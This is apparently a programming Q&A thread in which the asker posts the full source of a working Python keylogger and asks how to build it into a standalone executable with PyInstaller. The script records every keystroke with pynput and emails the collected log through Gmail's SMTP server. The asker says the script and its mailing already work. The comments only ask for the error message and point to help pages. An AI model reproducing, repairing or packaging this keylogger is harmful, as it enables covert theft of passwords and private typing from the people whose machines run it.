# How do I convert a .py/ .pyw to an independent executable?

Tags: python, pyinstaller, executable, malware

I made a simple keylogging program, but I'm unable to create a functioning exec file

```
import smtplib

from pynput.keyboard import Key, Listener

email = 'redacted'
password = 'redacted'
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.login(email, password)

full_log = ''
word = ''
email_char = 10

def on_press(key):
    global word
    global full_log
    global email
    global email_char
    if key == Key.space or key == Key.enter:
        word += ' '
        full_log += word
        word = ''
        if len(full_log) >= email_char:
            send_log()
            full_log = ''
    elif key == Key.backspace:
        word = word[:-1]
    else:
        char = f'{key}'
        char = char[1:-1]
        word += char
    if key == Key.esc:
        return False

def send_log():
    server.sendmail(
        email,
        email,
        full_log
    )

with Listener(on_press=on_press) as listener:
    listener.join()

print(''' .----------------.  .----------------.  .----------------.  .----------------. 
| .--------------. || .--------------. || .--------------. || .--------------. |
| | ____    ____ | || |      __      | || | _____  _____ | || |   _____      | |
| ||_   \  /   _|| || |     /  \     | || ||_   _||_   _|| || |  |_   _|     | |
| |  |   \/   |  | || |    / /\ \    | || |  | |    | |  | || |    | |       | |
| |  | |\  /| |  | || |   / ____ \   | || |  | '    ' |  | || |    | |   _   | |
| | _| |_\/_| |_ | || | _/ /    \ \_ | || |   \ `--' /   | || |   _| |__/ |  | |
| ||_____||_____|| || ||____|  |____|| || |    `.__.'    | || |  |________|  | |
| |              | || |              | || |              | || |              | |
| '--------------' || '--------------' || '--------------' || '--------------' |
 '----------------'  '----------------'  '----------------'  '----------------' ''')

input()
```

I tried using pyinstaller but the resulting exec file crashes immediately or gives fatal error.
any help is appreciated! and thank you for your patience!
edit: fatal error is "Failed To Execute Script [program name]"

Comment: "... gives fatal error." -- well, if you include the said error in your question then perhaps we can help you.

Comment: Sorry about the SOF hardos like this guy ^. I'm sure providing that error really helped understand the problem, Justin!

Comment: Is this code .py script running properly ?

Comment: yes, the python file is running well and mailing also works fine

Comment: Is "ModuleNotFoundError: No module named 'pynput'" error occuring while executing .exe file ? If not, what is the error code(like TypeError, FileNotFoundError, etc.). Show me full problem, or screenshot of problem

Comment: You should read [ask] - and there are any number of question on here 'why does my pyinstaller exe crash?' so please do more searching.